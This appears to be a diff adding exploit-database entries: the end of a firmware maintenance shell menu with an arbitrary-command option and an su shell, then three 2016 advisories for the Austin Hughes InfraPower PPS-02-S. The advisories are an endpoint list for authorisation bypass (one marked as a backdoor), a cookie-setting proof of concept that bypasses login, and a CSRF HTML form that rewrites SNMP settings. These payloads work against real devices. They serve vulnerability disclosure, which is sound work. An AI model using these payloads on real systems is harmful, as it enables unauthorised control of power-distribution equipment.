+echo "(9) Process Monitoring "
+echo "(A) Patch SNMP "
+echo "(B) Restore Configuration "
+echo "(P) Restore INI, POL profiles "
+echo "(E) Execute command line "
+echo "(M) View meminfo "
+echo "(X) Terminal console mode "
+echo "(R) Reboot "
+echo "(?) This menu "
+echo "(Q) Exit "
+echo "***********************************************"
+;;
+"1")
+echo "****/mnt/mtd/main_conf******************************"
+vi /mnt/mtd/main_conf
+echo "****************************************************"
+;;
+"2")
+echo "****/mnt/mtd/snmp_conf******************************"
+cat /mnt/mtd/snmp_conf
+echo "****************************************************"
+;;
+"3")
+echo "****/mnt/mtd/net_conf*******************************"
+cat /mnt/mtd/net_conf
+echo "****************************************************"
+;;
+"4")
+echo "****/mnt/mtd/web_conf*******************************"
+cat /mnt/mtd/web_conf
+echo "****************************************************"
+;;
+"5")
+echo "(5) Enable auto patching(boot.sh) on bootup "
+echo -n "Are you sure to continue? [y/n]:"
+read ans5
+if [ "$ans5" == "y" ]; then
+if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then
+echo -n "Patching boot.sh ..."
+cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh
+chmod 777 /mnt/mtd/boot.sh
+if [ -f "/mnt/mtd/boot.sh" ]; then
+echo "...done"
+else
+echo "...fail"
+fi
+else
+echo "file not exist: /mnt/mtd/patch/boot.sh"
+fi
+fi
+;;
+"6")
+echo "(6) Disable auto patching(boot.sh) on bootup "
+echo -n "Are you sure to continue? [y/n]:"
+read ans6
+if [ "$ans6" == "y" ]; then
+if [ -f "/mnt/mtd/boot.sh" ]; then
+echo -n "Disabling boot.sh pacthing..."
+rm /mnt/mtd/boot.sh
+echo "...done"
+else
+echo "File not exist: /mnt/mtd/boot.sh"
+fi
+fi
+;;
+"7")
+echo "(7) Clear /mnt/mtd/patch/ "
+echo -n "Are you sure to continue? [y/n]:"
+read ans7
+if [ "$ans7" == "y" ]; then
+echo -n " Removing patch files (/mnt/mtd/patch/*)..."
+rm -r /mnt/mtd/patch/*
+if [ ! -f "/mnt/mtd/patch/" ]; then
+echo "...done"
+echo -n "Reboot to apply changes? [y/n]:"
+read ans7r
+if [ "$ans7r" == "y" ]; then
+echo "Rebooting..."
+reboot
+fi
+
+else
+echo "...fail"
+fi
+fi
+;;
+"8")
+echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
+echo -n "Are you sure to continue? [y/n]:"
+read ans8
+if [ "$ans8" == "y" ]; then
+if [ -f "/www/patch/patch_now.sh" ]; then
+chmod 777 /www/patch/patch_now.sh
+sh /www/patch/patch_now.sh
+else
+echo "file not exist: /www/patch/patch_now.sh"
+fi
+fi
+;;
+"9")
+echo "****Process List*******************************"
+ps
+echo "***********************************************"
+;;
+"A")
+echo "(A) Patch SNMP "
+echo -n "Are you sure to continue? [y/n]:"
+read ans8
+if [ "$ans8" == "y" ]; then
+if [ -f "/www/patch/snmplink.sh" ]; then
+sh /www/patch/snmplink.sh
+if [ -f "/www/snmplink.log" ]; then
+cat /www/snmplink.log
+fi
+echo "Patching SNMP and its modules...done"
+else
+echo "file not exist: /www/patch/snmplink.sh"
+fi
+fi
+;;
+"B")
+echo "(B) Restore Box Configuration(box_conf) "
+echo -n "Are you sure to continue? [y/n]:"
+read ans8
+if [ "$ans8" == "y" ]; then
+if [ -f "/etc/box_conf" ]; then
+echo "Patching /mnt/mtd/box_conf..."
+cp /etc/box_conf /mnt/mtd/box_conf
+if [ -f "/mnt/mtd/box_conf" ]; then
+echo "Patching /mnt/mtd/box_conf...done"
+else
+echo "Patching /mnt/mtd/box_conf...failed"
+fi
+else
+echo "file not exist: /etc/box_conf"
+fi
+fi
+;;
+"P")
+INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ \t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1`
+echo "(P) Restore INI, POL profiles for $INFRA_VER "
+echo -n "Are you sure to continue? [y/n]:"
+read ansP
+if [ "$ansP" == "y" ]; then
+if [ "$InfraType" == "1" ]; then
+echo "Restoring INI, POL profiles for $INFRA_VER..."
+if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then
+echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..."
+cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini
+echo "...done"
+fi
+if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then
+echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..."
+cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol
+echo "...done"
+fi
+if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then
+echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..."
+cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini
+echo "...done"
+fi
+if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then
+echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..."
+cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol
+echo "...done"
+fi
+if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then
+echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..."
+cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini
+echo "...done"
+fi
+if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then
+echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..."
+cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol
+echo "...done"
+fi
+if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then
+echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..."
+cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini
+echo "...done"
+fi
+if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then
+echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..."
+cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol
+echo "...done"
+fi
+fi
+fi
+;;
+"E")
+echo -n "Input command line:"
+read cmd_line
+$cmd_line
+;;
+"M")
+if [ -f "/mnt/mtd/log_memCheck.txt" ]; then
+cat /mnt/mtd/log_memCheck.txt
+fi
+;;
+"R")
+echo "(R) Reboot "
+echo -n "Are you sure to continue? [y/n]:"
+read ansR
+if [ "$ansR" == "y" ]; then
+echo "Rebooting..."
+reboot
+fi
+;;
+"X")
+echo "su mode started!"
+su
+;;
+"Q")
+echo "Leaving maintenance mode........OK"
+exit 0
+;;
+esac
+done

platforms/php/webapps/40644.txt

@@ -0,0 +1,54 @@
+InfraPower PPS-02-S Q213V1 Insecure Direct Object Reference Authorization Bypass
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: Insecure Direct Object References occur when an application
+provides direct access to objects based on user-supplied input. As
+a result of this vulnerability attackers can bypass authorization
+and access resources and functionalities in the system directly, for
+example APIs, files, upload utilities, device settings, etc.
+
+Tested on: Linux 2.6.28 (armv5tel)
+           lighttpd/1.4.30-devel-1321
+           PHP/5.3.9
+           SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+                           @zeroscience
+
+
+Advisory ID: ZSL-2016-5373
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5373.php
+
+
+27.09.2016
+
+--
+
+
+GET /ConnPort.php
+GET /CSSSource.php
+GET /dball.php
+GET /doupgrate.php
+GET /IPSettings.php
+GET /ListFile.php
+GET /Menu.php
+GET /Ntp.php
+GET /PDUDetails_Ajax_Details.php
+GET /PDULog.php
+GET /PortSettings.php
+GET /production_test1.php ("backdoor")
+GET /UploadEXE.php

platforms/php/webapps/40645.txt

@@ -0,0 +1,142 @@
+InfraPower PPS-02-S Q213V1 Authentication Bypass Vulnerability
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: The device does not properly perform authentication, allowing
+it to be bypassed through cookie manipulation. The vulnerable function
+checkLogin() in 'Function.php' checks only if the 'Login' Cookie is empty
+or not, allowing easy bypass of the user security mechanisms.
+
+Tested on: Linux 2.6.28 (armv5tel)
+           lighttpd/1.4.30-devel-1321
+           PHP/5.3.9
+           SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+                           @zeroscience
+
+
+Advisory ID: ZSL-2016-5374
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5374.php
+
+
+27.09.2016
+
+--
+
+
+(example) System.php:
+---------------------
+1: <?php
+2:
+3: require_once("Function.php");
+4: session_start();
+5: if(!checkLogin())
+6:     header('Location: Login.php');
+7:
+
+---------------------------------------
+Function.php:
+-------------
+155: function checkLogin(){
+156:     if(empty($_SESSION['Login']))
+157:         return false;
+158:     return true;
+159: }
+160:
+
+
+--------------------
+'Sessioned' scripts:
+
+➜  www grep -rHn 'session_start' /Users/liwomac/Desktop/infrapower_files/www
+/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:3:	session_start();
+/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:3:	session_start();
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:2:    session_start();
+/Users/liwomac/Desktop/infrapower_files/www/Logout.php:2:	session_start();
+/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:3:	session_start();
+/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:3:	session_start();
+/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:3:	session_start();
+/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:9:	session_start();
+/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:3:	session_start();
+/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:3:	session_start();
+/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:3:	session_start();
+/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:3:    session_start();
+/Users/liwomac/Desktop/infrapower_files/www/System.php:4:	session_start();
+/Users/liwomac/Desktop/infrapower_files/www/User.php:3:    session_start();
+
+➜  www grep -rHn 'session_destroy' /Users/liwomac/Desktop/infrapower_files/www
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:256:            session_destroy();
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:266:            session_destroy();          
+/Users/liwomac/Desktop/infrapower_files/www/Logout.php:7:	session_destroy();
+/Users/liwomac/Desktop/infrapower_files/www/System.php:53:				session_destroy();
+/Users/liwomac/Desktop/infrapower_files/www/System.php:63:				session_destroy();
+
+➜  www grep -rHn '$_SESSION' /Users/liwomac/Desktop/infrapower_files/www
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:11:		if(isset($_SESSION['ite'])){
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:12:			$this->init($_SESSION['ite']);
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:156:        if(empty($_SESSION['Login']))
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:233:	if(!isset($_SESSION['TimeSync'])){
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:234:		$_SESSION['TimeSync'] = getConf("/mnt/mtd/main_conf", "TimeSyncPDU_opt");
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:235:		if($_SESSION['TimeSync'] == "ON"){
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:237:			$_SESSION['SyncDate'] = explode(":",$SyncDate);
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:239:			$_SESSION['TimeSync'] = "OFF";
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:240:			$_SESSION['SyncDate'][0] = "0";
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:241:			$_SESSION['SyncDate'][1] = "0";
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:255:            unset($_SESSION['Login']);
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:265:            unset($_SESSION['Login']);
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:31:		$_SESSION['ite'] = substr($this->InfraType,1,1); // e.g."t3v3" get the second chr 3;
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:64:        $_SESSION['ite'] = "1";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:67:        $_SESSION['ite'] = "2";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:70:        $_SESSION['ite'] = "3";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:73:        $_SESSION['ite'] = "3";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:76:        $_SESSION['ite'] = "3";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:79:        $_SESSION['ite'] = "4";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:82:		$_SESSION['ite'] = FALSE;
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:91:$_SESSION['ite'] = $InfraType;
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:137:                $_SESSION['Login'] = $_POST['ID_User'];
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:140:            $_SESSION['Login'] = $_POST['ID_User'];
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:156:            if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:167:            if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
+/Users/liwomac/Desktop/infrapower_files/www/Logout.php:3:	$_SESSION['Login'];
+/Users/liwomac/Desktop/infrapower_files/www/Logout.php:4:	if (isset($_SESSION['Login'])){
+/Users/liwomac/Desktop/infrapower_files/www/Logout.php:5:		unset($_SESSION['Login']);
+/Users/liwomac/Desktop/infrapower_files/www/Menu.php:60:	/*if ($_SESSION["SS_SystemCreated"] == "1") {
+/Users/liwomac/Desktop/infrapower_files/www/System.php:52:				unset($_SESSION['Login']);
+/Users/liwomac/Desktop/infrapower_files/www/System.php:62:				unset($_SESSION['Login']);
+
+➜  www grep -rHn 'checkLogin' /Users/liwomac/Desktop/infrapower_files/www
+/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:4:	if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:155:    function checkLogin(){
+/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:4:	if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:165:    if(checkLogin()) {
+/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:4:	if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:4:	if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:4:	if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:10:	if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:4:	if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:4:	if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:4:	if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:4:    if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/System.php:5:	if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/User.php:4:    if(!checkLogin())
+
+
+PoC:
+
+javascript:document.cookie="Login=StrangerThings;expires=Sat, 09 Dec 2017 11:05:17 GMT"
+
+--

platforms/php/webapps/40646.txt

@@ -0,0 +1,53 @@
+InfraPower PPS-02-S Q213V1 Cross-Site Request Forgery
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: The application interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the
+requests. This can be exploited to perform certain actions with admin
+privileges if a logged-in user visits a malicious web site.
+
+Tested on: Linux 2.6.28 (armv5tel)
+           lighttpd/1.4.30-devel-1321
+           PHP/5.3.9
+           SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+                           @zeroscience
+
+
+Advisory ID: ZSL-2016-5375
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5375.php
+
+
+27.09.2016
+
+--
+
+
+PoC:
+
+<html>
+  <body>
+    <form action="http://192.168.0.17/SNMP.php?Menu=SMP" method="POST">
+      <input type="hidden" name="SNMPAgent" value="Enable" />
+      <input type="hidden" name="CommuintyString" value="public" />
+      <input type="hidden" name="CommuintyWrite" value="private" />
+      <input type="hidden" name="TrapsVersion" value="v2Trap" />
+      <input type="hidden" name="IP" value="192&#46;168&#46;0&#46;254" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>